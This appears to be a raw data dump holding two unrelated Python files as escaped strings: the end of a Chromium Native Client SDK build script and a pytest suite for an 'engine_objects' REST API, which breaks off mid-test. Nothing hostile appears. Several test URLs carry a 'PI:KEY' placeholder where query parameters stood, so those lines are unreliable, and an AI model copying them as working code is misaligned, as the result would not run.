)\n\n if \'pnacl\' in toolchains:\n GypNinjaBuild_PPAPI(\'ia32\', GYPBUILD_DIR + \'-clang-ia32\',\n [\'use_nacl_clang=1\'])\n GypNinjaBuild_PPAPI(\'x64\', GYPBUILD_DIR + \'-clang-x64\',\n [\'use_nacl_clang=1\'])\n GypNinjaBuild_PPAPI(\'arm\', GYPBUILD_DIR + \'-clang-arm\',\n [\'use_nacl_clang=1\'])\n\n # NOTE: For ia32, gyp builds both x86-32 and x86-64 by default.\n for arch in (\'ia32\', \'arm\'):\n # Fill in the latest native pnacl shim library from the chrome build.\n build_dir = GYPBUILD_DIR + \'-pnacl-\' + arch\n GypNinjaBuild_Pnacl(build_dir, arch)\n\n GypNinjaInstall(pepperdir, toolchains)\n\n for toolchain in toolchains:\n if toolchain not in (\'host\', \'clang-newlib\'):\n InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, toolchain),\n toolchain)\n\n\n if \'pnacl\' in toolchains:\n # NOTE: For ia32, gyp builds both x86-32 and x86-64 by default.\n for arch in (\'ia32\', \'arm\'):\n # Fill in the latest native pnacl shim library from the chrome build.\n build_dir = GYPBUILD_DIR + \'-pnacl-\' + arch\n if arch == \'ia32\':\n nacl_arches = [\'x86-32\', \'x86-64\']\n elif arch == \'arm\':\n nacl_arches = [\'arm\']\n else:\n buildbot_common.ErrorExit(\'Unknown architecture: %s\' % arch)\n for nacl_arch in nacl_arches:\n release_build_dir = os.path.join(OUT_DIR, build_dir, \'Release\',\n \'gen\', \'tc_pnacl_translate\',\n \'lib-\' + nacl_arch)\n\n pnacldir = GetToolchainDir(pepperdir, \'pnacl\')\n pnacl_translator_lib_dir = GetPNaClTranslatorLib(pnacldir, nacl_arch)\n if not os.path.isdir(pnacl_translator_lib_dir):\n buildbot_common.ErrorExit(\'Expected %s directory to exist.\' %\n pnacl_translator_lib_dir)\n\n buildbot_common.CopyFile(\n os.path.join(release_build_dir, \'libpnacl_irt_shim.a\'),\n pnacl_translator_lib_dir)\n\n InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, \'pnacl\', \'x86\'),\n \'pnacl\')\n InstallNaClHeaders(GetToolchainNaClInclude(pepperdir, \'pnacl\', \'arm\'),\n \'pnacl\')\n\n\ndef MakeDirectoryOrClobber(pepperdir, dirname, clobber):\n dirpath = os.path.join(pepperdir, dirname)\n if clobber:\n buildbot_common.RemoveDir(dirpath)\n buildbot_common.MakeDir(dirpath)\n\n return dirpath\n\n\ndef BuildStepUpdateHelpers(pepperdir, clobber):\n buildbot_common.BuildStep(\'Update project helpers\')\n build_projects.UpdateHelpers(pepperdir, clobber=clobber)\n\n\ndef BuildStepUpdateUserProjects(pepperdir, toolchains,\n build_experimental, clobber):\n buildbot_common.BuildStep(\'Update examples and libraries\')\n\n filters = {}\n if not build_experimental:\n filters[\'EXPERIMENTAL\'] = False\n\n dsc_toolchains = []\n for t in toolchains:\n if t.startswith(\'x86_\') or t.startswith(\'arm_\'):\n if t[4:] not in dsc_toolchains:\n dsc_toolchains.append(t[4:])\n elif t == \'host\':\n dsc_toolchains.append(getos.GetPlatform())\n else:\n dsc_toolchains.append(t)\n\n filters[\'TOOLS\'] = dsc_toolchains\n\n # Update examples and libraries\n filters[\'DEST\'] = [\n \'getting_started\',\n \'examples/api\',\n \'examples/demo\',\n \'examples/tutorial\',\n \'src\'\n ]\n\n tree = parse_dsc.LoadProjectTree(SDK_SRC_DIR, include=filters)\n build_projects.UpdateProjects(pepperdir, tree, clobber=clobber,\n toolchains=dsc_toolchains)\n\n\ndef BuildStepMakeAll(pepperdir, directory, step_name,\n deps=True, clean=False, config=\'Debug\', args=None):\n buildbot_common.BuildStep(step_name)\n build_projects.BuildProjectsBranch(pepperdir, directory, clean,\n deps, config, args)\n\n\ndef BuildStepBuildLibraries(pepperdir, directory):\n BuildStepMakeAll(pepperdir, directory, \'Build Libraries 
Debug\',\n clean=True, config=\'Debug\')\n BuildStepMakeAll(pepperdir, directory, \'Build Libraries Release\',\n clean=True, config=\'Release\')\n\n # Cleanup .pyc file generated while building libraries. Without\n # this we would end up shipping the pyc in the SDK tarball.\n buildbot_common.RemoveFile(os.path.join(pepperdir, \'tools\', \'*.pyc\'))\n\n\ndef GenerateNotice(fileroot, output_filename=\'NOTICE\', extra_files=None):\n # Look for LICENSE files\n license_filenames_re = re.compile(\'LICENSE|COPYING|COPYRIGHT\')\n\n license_files = []\n for root, _, files in os.walk(fileroot):\n for filename in files:\n if license_filenames_re.match(filename):\n path = os.path.join(root, filename)\n license_files.append(path)\n\n if extra_files:\n license_files += [os.path.join(fileroot, f) for f in extra_files]\n print \'\\n\'.join(license_files)\n\n if not os.path.isabs(output_filename):\n output_filename = os.path.join(fileroot, output_filename)\n generate_notice.Generate(output_filename, fileroot, license_files)\n\n\ndef BuildStepVerifyFilelist(pepperdir):\n buildbot_common.BuildStep(\'Verify SDK Files\')\n file_list_path = os.path.join(SCRIPT_DIR, \'sdk_files.list\')\n try:\n print \'SDK directory: %s\' % pepperdir\n verify_filelist.Verify(file_list_path, pepperdir)\n print \'OK\'\n except verify_filelist.ParseException, e:\n buildbot_common.ErrorExit(\'Parsing sdk_files.list failed:\\n\\n%s\' % e)\n except verify_filelist.VerifyException, e:\n file_list_rel = os.path.relpath(file_list_path)\n verify_filelist_py = os.path.splitext(verify_filelist.__file__)[0] + \'.py\'\n verify_filelist_py = os.path.relpath(verify_filelist_py)\n pepperdir_rel = os.path.relpath(pepperdir)\n\n msg = """"""\\\nSDK verification failed:\n\n%s\nAdd/remove files from %s to fix.\n\nRun:\n ./%s %s %s\nto test."""""" % (e, file_list_rel, verify_filelist_py, file_list_rel,\n pepperdir_rel)\n buildbot_common.ErrorExit(msg)\n\n\ndef BuildStepTarBundle(pepper_ver, tarfile):\n buildbot_common.BuildStep(\'Tar Pepper Bundle\')\n buildbot_common.MakeDir(os.path.dirname(tarfile))\n buildbot_common.Run([sys.executable, CYGTAR, \'-C\', OUT_DIR, \'-cjf\', tarfile,\n \'pepper_\' + pepper_ver], cwd=NACL_DIR)\n\n\ndef GetManifestBundle(pepper_ver, chrome_revision, nacl_revision, tarfile,\n archive_url):\n with open(tarfile, \'rb\') as tarfile_stream:\n archive_sha1, archive_size = manifest_util.DownloadAndComputeHash(\n tarfile_stream)\n\n archive = manifest_util.Archive(manifest_util.GetHostOS())\n archive.url = archive_url\n archive.size = archive_size\n archive.checksum = archive_sha1\n\n bundle = manifest_util.Bundle(\'pepper_\' + pepper_ver)\n bundle.revision = int(chrome_revision)\n bundle.repath = \'pepper_\' + pepper_ver\n bundle.version = int(pepper_ver)\n bundle.description = (\n \'Chrome %s bundle. Chrome revision: %s. 
NaCl revision: %s\' % (\n pepper_ver, chrome_revision, nacl_revision))\n bundle.stability = \'dev\'\n bundle.recommended = \'no\'\n bundle.archives = [archive]\n return bundle\n\n\ndef Archive(filename, from_directory, step_link=True):\n if buildbot_common.IsSDKBuilder():\n bucket_path = \'nativeclient-mirror/nacl/nacl_sdk/\'\n else:\n bucket_path = \'nativeclient-mirror/nacl/nacl_sdk_test/\'\n bucket_path += build_version.ChromeVersion()\n buildbot_common.Archive(filename, bucket_path, from_directory, step_link)\n\n\ndef BuildStepArchiveBundle(name, pepper_ver, chrome_revision, nacl_revision,\n tarfile):\n buildbot_common.BuildStep(\'Archive %s\' % name)\n tarname = os.path.basename(tarfile)\n tarfile_dir = os.path.dirname(tarfile)\n Archive(tarname, tarfile_dir)\n\n # generate ""manifest snippet"" for this archive.\n archive_url = GSTORE + \'nacl_sdk/%s/%s\' % (\n build_version.ChromeVersion(), tarname)\n bundle = GetManifestBundle(pepper_ver, chrome_revision, nacl_revision,\n tarfile, archive_url)\n\n manifest_snippet_file = os.path.join(OUT_DIR, tarname + \'.json\')\n with open(manifest_snippet_file, \'wb\') as manifest_snippet_stream:\n manifest_snippet_stream.write(bundle.GetDataAsString())\n\n Archive(tarname + \'.json\', OUT_DIR, step_link=False)\n\n\ndef BuildStepBuildPNaClComponent(version, revision):\n # Sadly revision can go backwards for a given version since when a version\n # is built from master, revision will be a huge number (in the hundreds of\n # thousands). Once the branch happens the revision will reset to zero.\n # TODO(sbc): figure out how to compensate for this in some way such that\n # revisions always go forward for a given version.\n buildbot_common.BuildStep(\'PNaCl Component\')\n # Version numbers must follow the format specified in:\n # https://developer.chrome.com/extensions/manifest/version\n # So ensure that rev_major/rev_minor don\'t overflow and ensure there\n # are no leading zeros.\n if len(revision) > 4:\n rev_minor = int(revision[-4:])\n rev_major = int(revision[:-4])\n version = ""0.%s.%s.%s"" % (version, rev_major, rev_minor)\n else:\n version = ""0.%s.0.%s"" % (version, revision)\n buildbot_common.Run([\'./make_pnacl_component.sh\',\n \'pnacl_multicrx_%s.zip\' % revision,\n version], cwd=SCRIPT_DIR)\n\n\ndef BuildStepArchivePNaClComponent(revision):\n buildbot_common.BuildStep(\'Archive PNaCl Component\')\n Archive(\'pnacl_multicrx_%s.zip\' % revision, OUT_DIR)\n\n\ndef BuildStepArchiveSDKTools():\n buildbot_common.BuildStep(\'Build SDK Tools\')\n build_updater.BuildUpdater(OUT_DIR)\n\n buildbot_common.BuildStep(\'Archive SDK Tools\')\n Archive(\'sdk_tools.tgz\', OUT_DIR, step_link=False)\n Archive(\'nacl_sdk.zip\', OUT_DIR, step_link=False)\n\n\ndef BuildStepBuildAppEngine(pepperdir, chrome_revision):\n """"""Build the projects found in src/gonacl_appengine/src""""""\n buildbot_common.BuildStep(\'Build GoNaCl AppEngine Projects\')\n cmd = [\'make\', \'upload\', \'REVISION=%s\' % chrome_revision]\n env = dict(os.environ)\n env[\'NACL_SDK_ROOT\'] = pepperdir\n env[\'NACLPORTS_NO_ANNOTATE\'] = ""1""\n buildbot_common.Run(cmd, env=env, cwd=GONACL_APPENGINE_SRC_DIR)\n\n\ndef main(args):\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\'--qemu\', help=\'Add qemu for ARM.\',\n action=\'store_true\')\n parser.add_argument(\'--tar\', help=\'Force the tar step.\',\n action=\'store_true\')\n parser.add_argument(\'--archive\', help=\'Force the archive step.\',\n action=\'store_true\')\n parser.add_argument(\'--release\', 
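# when given, overrides the pepper_ver derived from the Chrome version\n 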
help=\'PPAPI release version.\',\n dest=\'release\', default=None)\n parser.add_argument(\'--build-app-engine\',\n help=\'Build AppEngine demos.\', action=\'store_true\')\n parser.add_argument(\'--experimental\',\n help=\'build experimental examples and libraries\', action=\'store_true\',\n dest=\'build_experimental\')\n parser.add_argument(\'--skip-toolchain\', help=\'Skip toolchain untar\',\n action=\'store_true\')\n parser.add_argument(\'--no-clean\', dest=\'clean\', action=\'store_false\',\n help=""Don\'t clean gypbuild directories"")\n parser.add_argument(\'--mac-sdk\',\n help=\'Set the mac-sdk (e.g. 10.6) to use when building with ninja.\')\n parser.add_argument(\'--no-arm-trusted\', action=\'store_true\',\n help=\'Disable building of ARM trusted components (sel_ldr, etc).\')\n parser.add_argument(\'--no-use-sysroot\', action=\'store_true\',\n help=\'Disable building against sysroot.\')\n\n # To set up bash completion for this command first install optcomplete\n # and then add this line to your .bashrc:\n # complete -F _optcomplete build_sdk.py\n try:\n import optcomplete\n optcomplete.autocomplete(parser)\n except ImportError:\n pass\n\n global options\n options = parser.parse_args(args)\n\n buildbot_common.BuildStep(\'build_sdk\')\n\n if buildbot_common.IsSDKBuilder():\n options.archive = True\n # TODO(binji): re-enable app_engine build when the linux builder stops\n # breaking when trying to git clone from github.\n # See http://crbug.com/412969.\n options.build_app_engine = False\n options.tar = True\n\n # NOTE: order matters here. This will be the order that is specified in the\n # Makefiles; the first toolchain will be the default.\n toolchains = [\'pnacl\', \'x86_glibc\', \'arm_glibc\', \'clang-newlib\', \'host\']\n\n print \'Building: \' + \' \'.join(toolchains)\n platform = getos.GetPlatform()\n\n if options.archive and not options.tar:\n parser.error(\'Incompatible arguments with archive.\')\n\n chrome_version = int(build_version.ChromeMajorVersion())\n chrome_revision = build_version.ChromeRevision()\n nacl_revision = build_version.NaClRevision()\n pepper_ver = str(chrome_version)\n pepper_old = str(chrome_version - 1)\n pepperdir = os.path.join(OUT_DIR, \'pepper_\' + pepper_ver)\n pepperdir_old = os.path.join(OUT_DIR, \'pepper_\' + pepper_old)\n tarname = \'naclsdk_%s.tar.bz2\' % platform\n tarfile = os.path.join(OUT_DIR, tarname)\n\n if options.release:\n pepper_ver = options.release\n print \'Building PEPPER %s at %s\' % (pepper_ver, chrome_revision)\n\n if \'NACL_SDK_ROOT\' in os.environ:\n # We don\'t want the currently configured NACL_SDK_ROOT to have any effect\n # on the build.\n del os.environ[\'NACL_SDK_ROOT\']\n\n if platform == \'linux\':\n # Linux-only: make sure the debian/stable sysroot image is installed\n install_script = os.path.join(SRC_DIR, \'build\', \'linux\', \'sysroot_scripts\',\n \'install-sysroot.py\')\n\n buildbot_common.Run([sys.executable, install_script, \'--arch=arm\'])\n buildbot_common.Run([sys.executable, install_script, \'--arch=i386\'])\n buildbot_common.Run([sys.executable, install_script, \'--arch=amd64\'])\n\n if not options.skip_toolchain:\n BuildStepCleanPepperDirs(pepperdir, pepperdir_old)\n BuildStepMakePepperDirs(pepperdir, [\'include\', \'toolchain\', \'tools\'])\n BuildStepDownloadToolchains(toolchains)\n BuildStepUntarToolchains(pepperdir, toolchains)\n if platform == \'linux\':\n buildbot_common.Move(os.path.join(pepperdir, \'toolchain\', \'arm_trusted\'),\n os.path.join(OUT_DIR, \'arm_trusted\'))\n\n\n if platform == 
\'linux\':\n # Linux-only: Copy arm libraries from the arm_trusted package. These are\n # needed to be able to run sel_ldr_arm under qemu.\n arm_libs = [\n \'lib/arm-linux-gnueabihf/librt.so.1\',\n \'lib/arm-linux-gnueabihf/libpthread.so.0\',\n \'lib/arm-linux-gnueabihf/libgcc_s.so.1\',\n \'lib/arm-linux-gnueabihf/libc.so.6\',\n \'lib/arm-linux-gnueabihf/ld-linux-armhf.so.3\',\n \'lib/arm-linux-gnueabihf/libm.so.6\',\n \'usr/lib/arm-linux-gnueabihf/libstdc++.so.6\'\n ]\n arm_lib_dir = os.path.join(pepperdir, \'tools\', \'lib\', \'arm_trusted\', \'lib\')\n buildbot_common.MakeDir(arm_lib_dir)\n for arm_lib in arm_libs:\n arm_lib = os.path.join(OUT_DIR, \'arm_trusted\', arm_lib)\n buildbot_common.CopyFile(arm_lib, arm_lib_dir)\n buildbot_common.CopyFile(os.path.join(OUT_DIR, \'arm_trusted\', \'qemu-arm\'),\n os.path.join(pepperdir, \'tools\'))\n\n\n BuildStepBuildToolchains(pepperdir, toolchains,\n not options.skip_toolchain,\n options.clean)\n\n BuildStepUpdateHelpers(pepperdir, True)\n BuildStepUpdateUserProjects(pepperdir, toolchains,\n options.build_experimental, True)\n\n BuildStepCopyTextFiles(pepperdir, pepper_ver, chrome_revision, nacl_revision)\n\n # Ship with libraries prebuilt, so run that first.\n BuildStepBuildLibraries(pepperdir, \'src\')\n GenerateNotice(pepperdir)\n\n # Verify the SDK contains what we expect.\n BuildStepVerifyFilelist(pepperdir)\n\n if options.tar:\n BuildStepTarBundle(pepper_ver, tarfile)\n\n if platform == \'linux\':\n BuildStepBuildPNaClComponent(pepper_ver, chrome_revision)\n\n if options.build_app_engine and platform == \'linux\':\n BuildStepBuildAppEngine(pepperdir, chrome_revision)\n\n if options.qemu:\n qemudir = os.path.join(NACL_DIR, \'toolchain\', \'linux_arm-trusted\')\n oshelpers.Copy([\'-r\', qemudir, pepperdir])\n\n # Archive the results on Google Cloud Storage.\n if options.archive:\n BuildStepArchiveBundle(\'build\', pepper_ver, chrome_revision, nacl_revision,\n tarfile)\n # Only archive sdk_tools/naclport/pnacl_component on linux.\n if platform == \'linux\':\n BuildStepArchiveSDKTools()\n BuildStepArchivePNaClComponent(chrome_revision)\n\n return 0\n\n\nif __name__ == \'__main__\':\n try:\n sys.exit(main(sys.argv[1:]))\n except KeyboardInterrupt:\n buildbot_common.ErrorExit(\'build_sdk: interrupted\')\n', '# MIT License\n\n# Copyright (c) 2016 Diogo Dutra dummy@email.com\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the ""Software""), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\nimport asyncio\nimport tempfile\nfrom datetime import datetime\nfrom time import sleep\nfrom unittest import mock\n\nfrom swaggerit.models._base import _all_models\nfrom tests.integration.fixtures import TopSellerArrayTest\n\nimport pytest\nimport ujson\n\n\n@pytest.fixture\ndef init_db(models, session, api):\n user = {\n \'name\': \'test\',\n \'email\': \'test\',\n \'password\': \'test\',\n \'admin\': True\n }\n session.loop.run_until_complete(models[\'users\'].insert(session, user))\n\n tmp = tempfile.TemporaryDirectory()\n store = {\n \'name\': \'test\',\n \'country\': \'test\',\n \'configuration\': {}\n }\n session.loop.run_until_complete(models[\'stores\'].insert(session, store))\n\n item_type = {\n \'name\': \'products\',\n \'schema\': {\n \'type\': \'object\',\n \'id_names\': [\'sku\'],\n \'properties\': {\'sku\': {\'type\': \'string\'}}\n },\n \'stores\': [{\'id\': 1}]\n }\n session.loop.run_until_complete(models[\'item_types\'].insert(session, item_type))\n\n strategy = {\n \'name\': \'test\',\n \'class_module\': \'tests.integration.fixtures\',\n \'class_name\': \'EngineStrategyTest\'\n }\n session.loop.run_until_complete(models[\'engine_strategies\'].insert(session, strategy))\n\n engine_object = {\n \'name\': \'Top Seller Object\',\n \'type\': \'top_seller_array\',\n \'configuration\': {\'days_interval\': 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1\n }\n session.loop.run_until_complete(models[\'engine_objects\'].insert(session, engine_object))\n\n\n yield tmp.name\n\n tmp.cleanup()\n _all_models.pop(\'store_items_products_1\', None)\n\n\nclass TestEngineObjectsModelPost(object):\n\n async def test_post_without_body(self, init_db, client, headers, headers_without_content_type):\n client = await client\n resp = await client.post(\'/engine_objects/\', headers=headers)\n assert resp.status == 400\n assert (await resp.json()) == {\'message\': \'Request body is missing\'}\n\n async def test_post_with_invalid_body(self, init_db, client, headers, headers_without_content_type):\n client = await client\n resp = await client.post(\'/engine_objects/\', headers=headers, data=\'[{}]\')\n assert resp.status == 400\n assert (await resp.json()) == {\n \'message\': ""\'name\' is a required property. 
""\\\n ""Failed validating instance[\'0\'] for schema[\'items\'][\'required\']"",\n \'schema\': {\n \'type\': \'object\',\n \'additionalProperties\': False,\n \'required\': [\'name\', \'type\', \'configuration\', \'strategy_id\', \'item_type_id\', \'store_id\'],\n \'properties\': {\n \'name\': {\'type\': \'string\'},\n \'type\': {\'type\': \'string\'},\n \'strategy_id\': {\'type\': \'integer\'},\n \'item_type_id\': {\'type\': \'integer\'},\n \'store_id\': {\'type\': \'integer\'},\n \'configuration\': {}\n }\n }\n }\n\n async def test_post(self, init_db, client, headers, headers_without_content_type):\n client = await client\n body = [{\n \'name\': \'Top Seller Object Test\',\n \'type\': \'top_seller_array\',\n \'configuration\': {\'days_interval\': 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1\n }]\n resp = await client.post(\'/engine_objects/\', headers=headers, data=ujson.dumps(body))\n resp_json = (await resp.json())\n body[0][\'id\'] = 2\n body[0][\'store\'] = resp_json[0][\'store\']\n body[0][\'strategy\'] = resp_json[0][\'strategy\']\n body[0][\'item_type\'] = resp_json[0][\'item_type\']\n\n assert resp.status == 201\n assert resp_json == body\n\n async def test_post_with_invalid_grant(self, client):\n client = await client\n body = [{\n \'name\': \'Top Seller Object Test\',\n \'type\': \'top_seller_array\',\n \'configuration\': {\'days_interval\': 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1\n }]\n resp = await client.post(\'/engine_objects/\', headers={\'Authorization\': \'invalid\'}, data=ujson.dumps(body))\n assert resp.status == 401\n assert (await resp.json()) == {\'message\': \'Invalid authorization\'}\n\n\nclass TestEngineObjectsModelGet(object):\n\n async def test_get_not_found(self, init_db, headers_without_content_type, client):\n client = await client\n resp = await client.get(\n \'/engine_objects/?store_id=2&item_type_id=1&strategy_id=1\',\n headers=headers_without_content_type\n )\n assert resp.status == 404\n\n async def test_get_invalid_with_body(self, init_db, headers, client):\n client = await client\n resp = await client.get(\n \'/engine_objects/?store_id=1&item_type_id=1&strategy_id=1\',\n headers=headers,\n data=\'{}\'\n )\n assert resp.status == 400\n assert await resp.json() == {\'message\': \'Request body is not acceptable\'}\n\n async def test_get_valid(self, init_db, headers, headers_without_content_type, client):\n body = [{\n \'name\': \'Top Seller Object\',\n \'type\': \'top_seller_array\',\n \'configuration\': {""days_interval"": 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1,\n \'id\': 1,\n \'store\': {\n \'id\': 1,\n \'name\': \'test\',\n \'country\': \'test\',\n \'configuration\': {}\n },\n \'item_type\': {\n \'id\': 1,\n \'store_items_class\': None,\n \'stores\': [{\n \'configuration\': {},\n \'country\': \'test\',\n \'id\': 1,\n \'name\': \'test\'\n }],\n \'name\': \'products\',\n \'schema\': {\n \'type\': \'object\',\n \'id_names\': [\'sku\'],\n \'properties\': {\'sku\': {\'type\': \'string\'}}\n },\n \'available_filters\': [{\'name\': \'sku\', \'schema\': {\'type\': \'string\'}}]\n },\n \'strategy\': {\n \'id\': 1,\n \'name\': \'test\',\n \'class_module\': \'tests.integration.fixtures\',\n \'class_name\': \'EngineStrategyTest\',\n \'object_types\': [\'top_seller_array\']\n }\n }]\n\n client = await client\n resp = await client.get(\n \'/engine_objects/?store_id=1&item_type_id=1&strategy_id=1\',\n headers=headers_without_content_type\n )\n assert resp.status == 200\n assert await 
resp.json() == body\n\n\nclass TestEngineObjectsModelUriTemplatePatch(object):\n\n async def test_patch_without_body(self, init_db, client, headers, headers_without_content_type):\n client = await client\n resp = await client.patch(\'/engine_objects/1/\', headers=headers, data=\'\')\n assert resp.status == 400\n assert (await resp.json()) == {\'message\': \'Request body is missing\'}\n\n async def test_patch_with_invalid_body(self, init_db, client, headers, headers_without_content_type):\n client = await client\n resp = await client.patch(\'/engine_objects/1/\', headers=headers, data=\'{}\')\n assert resp.status == 400\n assert (await resp.json()) == {\n \'message\': \'{} does not have enough properties. \'\\\n ""Failed validating instance for schema[\'minProperties\']"",\n \'schema\': {\n \'type\': \'object\',\n \'additionalProperties\': False,\n \'minProperties\': 1,\n \'properties\': {\n \'name\': {\'type\': \'string\'},\n \'configuration\': {}\n }\n }\n }\n\n async def test_patch_with_invalid_config(self, init_db, client, headers, headers_without_content_type):\n client = await client\n body = {\n \'configuration\': {}\n }\n resp = await client.patch(\'/engine_objects/1/\', headers=headers, data=ujson.dumps(body))\n assert resp.status == 400\n print(ujson.dumps(await resp.json(), indent=4))\n assert (await resp.json()) == {\n \'message\': ""\'days_interval\' is a required property. ""\\\n ""Failed validating instance for schema[\'required\']"",\n \'schema\': {\n \'type\': \'object\',\n \'required\': [\'days_interval\'],\n \'additionalProperties\': False,\n \'properties\': {\n \'days_interval\': {\'type\': \'integer\'}\n }\n }\n }\n\n async def test_patch_not_found(self, init_db, client, headers, headers_without_content_type):\n client = await client\n body = {\n \'name\': \'Top Seller Object Test\'\n }\n resp = await client.patch(\'/engine_objects/2/\', headers=headers, data=ujson.dumps(body))\n assert resp.status == 404\n\n async def test_patch(self, init_db, client, headers, headers_without_content_type):\n client = await client\n body = [{\n \'name\': \'Top Seller Object Test\',\n \'type\': \'top_seller_array\',\n \'configuration\': {\'days_interval\': 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n \'strategy_id\': 1\n }]\n resp = await client.post(\'/engine_objects/\', headers=headers, data=ujson.dumps(body))\n obj = (await resp.json())[0]\n\n body = {\n \'name\': \'test2\'\n }\n resp = await client.patch(\'/engine_objects/2/\', headers=headers, data=ujson.dumps(body))\n obj[\'name\'] = \'test2\'\n\n assert resp.status == 200\n assert (await resp.json()) == obj\n\n\nclass TestEngineObjectsModelUriTemplateGet(object):\n\n async def test_get_with_body(self, init_db, headers, client):\n client = await client\n resp = await client.get(\'/engine_objects/1/\', headers=headers, data=\'{}\')\n assert resp.status == 400\n assert await resp.json() == {\'message\': \'Request body is not acceptable\'}\n\n async def test_get_not_found(self, init_db, headers_without_content_type, client):\n client = await client\n resp = await client.get(\'/engine_objects/2/\', headers=headers_without_content_type)\n assert resp.status == 404\n\n async def test_get(self, init_db, headers, headers_without_content_type, client):\n client = await client\n resp = await client.get(\'/engine_objects/1/\', headers=headers_without_content_type)\n body = {\n \'name\': \'Top Seller Object\',\n \'type\': \'top_seller_array\',\n \'configuration\': {""days_interval"": 7},\n \'store_id\': 1,\n \'item_type_id\': 1,\n 
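# (The 400 payloads asserted in these tests echo jsonschema's ValidationError
#  wording: "'name' is a required property" for a missing 'required' member,
#  "{} does not have enough properties" for 'minProperties', with the failing
#  subschema returned under the 'schema' key. A hedged check, assuming the
#  jsonschema package:
#      from jsonschema import Draft4Validator
#      err = next(Draft4Validator({'type': 'object',
#                                  'required': ['name']}).iter_errors({}))
#      err.message  # "'name' is a required property"
#  )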
\'strategy_id\': 1,\n \'id\': 1,\n \'store\': {\n \'id\': 1,\n \'name\': \'test\',\n \'country\': \'test\',\n \'configuration\': {}\n },\n \'item_type\': {\n \'id\': 1,\n \'store_items_class\': None,\n \'stores\': [{\n \'configuration\': {},\n \'country\': \'test\',\n \'id\': 1,\n \'name\': \'test\'\n }],\n \'name\': \'products\',\n \'schema\': {\n \'type\': \'object\',\n \'id_names\': [\'sku\'],\n \'properties\': {\'sku\': {\'type\': \'string\'}}\n },\n \'available_filters\': [{\'name\': \'sku\', \'schema\': {\'type\': \'string\'}}]\n },\n \'strategy\': {\n \'id\': 1,\n \'name\': \'test\',\n \'class_module\': \'tests.integration.fixtures\',\n \'class_name\': \'EngineStrategyTest\',\n \'object_types\': [\'top_seller_array\']\n }\n }\n\n assert resp.status == 200\n assert await resp.json() == body\n\n\nclass TestEngineObjectsModelUriTemplateDelete(object):\n\n async def test_delete_with_body(self, init_db, client, headers):\n client = await client\n\n resp = await client.delete(\'/engine_objects/1/\', headers=headers, data=\'{}\')\n assert resp.status == 400\n assert (await resp.json()) == {\'message\': \'Request body is not acceptable\'}\n\n async def test_delete_valid(self, init_db, client, headers, headers_without_content_type):\n client = await client\n\n resp = await client.get(\'/engine_objects/1/\', headers=headers_without_content_type)\n assert resp.status == 200\n\n resp = await client.delete(\'/engine_objects/1/\', headers=headers_without_content_type)\n assert resp.status == 204\n\n resp = await client.get(\'/engine_objects/1/\', headers=headers_without_content_type)\n assert resp.status == 404\n\n\ndef datetime_mock():\n mock_ = mock.MagicMock()\n mock_.now.return_value = datetime(1900, 1, 1)\n return mock_\n\n\nasync def _wait_job_finish(client, headers_without_content_type, job_name=\'export\'):\n sleep(0.05)\n while True:\n resp = await client.get(\n \'/engine_objects/1/{}?PI:KEY\'.format(job_name),\n headers=headers_without_content_type)\n if (await resp.json())[\'status\'] != \'running\':\n break\n\n return resp\n\n\ndef set_patches(monkeypatch):\n monkeypatch.setattr(\'swaggerit.models.orm._jobs_meta.random.getrandbits\',\n mock.MagicMock(return_value=131940827655846590526331314439483569710))\n monkeypatch.setattr(\'swaggerit.models.orm._jobs_meta.datetime\', datetime_mock())\n\n\nclass TestEngineObjectsModelsDataImporter(object):\n\n async def test_importer_post(self, init_db, headers, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n resp = await client.post(\'/engine_objects/1/import_data\', headers=headers_without_content_type)\n\n assert resp.status == 201\n assert await resp.json() == {\'job_hash\': \'6342e10bd7dca3240c698aa79c98362e\'}\n await _wait_job_finish(client, headers_without_content_type, \'import_data\')\n\n async def test_importer_get_running(self, init_db, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await client.post(\'/engine_objects/1/import_data\', headers=headers_without_content_type)\n resp = await client.get(\'/engine_objects/1/import_data?PI:KEY\',\n headers=headers_without_content_type)\n\n assert await resp.json() == {\'status\': \'running\'}\n await _wait_job_finish(client, headers_without_content_type, \'import_data\')\n\n\n async def test_importer_get_done(self, init_db, headers_without_content_type, client, monkeypatch):\n set_patches(monkeypatch)\n client = await client\n await client.post(\'/engine_objects/1/import_data\', 
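# (_wait_job_finish above sleeps 50 ms and then busy-polls the job endpoint
#  until its 'status' leaves 'running'; set_patches pins random.getrandbits
#  and datetime.now(), which is why the job_hash and the '1900-01-01 00:00'
#  time_info asserted in these tests are fully deterministic across runs.)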
